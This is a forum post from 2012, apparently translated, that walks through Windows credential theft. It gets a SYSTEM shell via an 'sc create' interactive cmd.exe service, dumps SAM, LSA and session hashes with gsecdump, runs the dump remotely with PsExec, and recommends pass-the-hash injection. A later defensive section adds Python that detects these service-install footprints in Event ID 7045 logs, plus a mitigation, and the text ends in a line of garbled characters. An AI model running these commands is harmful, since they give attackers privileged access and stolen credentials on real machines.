HASH injection attack

Original poster, posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: with iam from the pshtools toolkit you can load the hash information just captured with gsecdump into the local lsass process to carry out a hash injection attack. The foreigners are really something; this is going to keep administrators busy. The LM/NT hashes picked up during ARP spoofing, and those obtained with gethash, actually never need to be cracked at all; it is purely a matter of using the tool. As the original article puts it well: whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
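From the defender's side, the procedure in the post leaves two footprints in the Windows System log that are easy to alert on: Service Control Manager Event ID 7045 ("A service was installed in the system") for a service whose image is cmd.exe and whose type is interactive, and the PSEXESVC service that PsExec installs on the remote host before running the copied binary. The Python below is an added example written for this edit, not code from the post, from gsecdump or from Sysinternals; the sample records are constructed, and the flattened field names (Host, ServiceName, ImagePath, ServiceType, ...) are this example's own assumption about how a SIEM export might present the event.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample records, not real logs: Event ID 7045 from the System log,
# flattened one record per line. Field names are an assumption of this example.
SAMPLE_EVENTS = [
    r'EventID=7045 Host=WS01 ServiceName=shellcmdline ImagePath="C:\WINDOWS\system32\cmd.exe /K start" ServiceType="user mode service (interactive)" StartType="demand start" Account=LocalSystem',
    r'EventID=7045 Host=WS01 ServiceName=PSEXESVC ImagePath=%SystemRoot%\PSEXESVC.exe ServiceType="user mode service" StartType="demand start" Account=LocalSystem',
    r'EventID=7045 Host=WS02 ServiceName=Spooler2 ImagePath=C:\WINDOWS\system32\spoolsv.exe ServiceType="user mode service" StartType="auto start" Account=LocalSystem',
    r'EventID=7036 Host=WS02 ServiceName=Spooler2 State=running',
]

# key=value pairs; a value may be double-quoted so that it can contain spaces.
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Interpreters that have no business being a service image: a service whose
# binpath is cmd.exe runs that shell as LocalSystem, the trick in the post above.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe"}


@dataclass
class Finding:
    host: str
    service: str
    image: str
    reasons: List[str] = field(default_factory=list)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened record into a dict of its fields."""
    return {key: (quoted or bare) for key, quoted, bare in _KV.findall(line)}


def image_basename(image_path: str) -> str:
    """Executable name from a service image path, ignoring arguments and directories."""
    exe = image_path.strip().split(" ")[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: Dict[str, str]) -> List[str]:
    """Return the reasons a 7045 event looks like SCM abuse; [] if it looks clean."""
    if event.get("EventID") != "7045":
        return []
    reasons: List[str] = []
    exe = image_basename(event.get("ImagePath", ""))
    if exe in SHELL_IMAGES:
        reasons.append("shell-as-service")
    if "interactive" in event.get("ServiceType", "").lower():
        reasons.append("interactive-service")
    if event.get("ServiceName", "").upper() == "PSEXESVC" or exe == "psexesvc.exe":
        reasons.append("psexec-service")
    return reasons


def scan(lines: List[str]) -> List[Finding]:
    """Apply assess() to every record and keep only the suspicious ones."""
    findings: List[Finding] = []
    for line in lines:
        event = parse_event(line)
        reasons = assess(event)
        if reasons:
            findings.append(Finding(event.get("Host", "?"), event.get("ServiceName", "?"),
                                    event.get("ImagePath", ""), reasons))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: service '{f.service}' ({f.image}) -> {', '.join(f.reasons)}")
```

Run against the constructed records it reports the shellcmdline service on WS01 as both a shell-as-service and an interactive service, and the PSEXESVC service on the same host as a PsExec footprint, while the ordinary spooler service passes. On the point the post makes about LM hashes and rainbow tables, the standard mitigation is to stop the domain controller and workstations from storing LM hashes at all (the NoLMHash policy under HKLM\SYSTEM\CurrentControlSet\Control\Lsa), so that only the NT hash remains; that does not stop hash replay, which is what the post's "100%" remark is about, but it removes the cheaply crackable form.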
8 q" o; A  J& o* W: v. p  C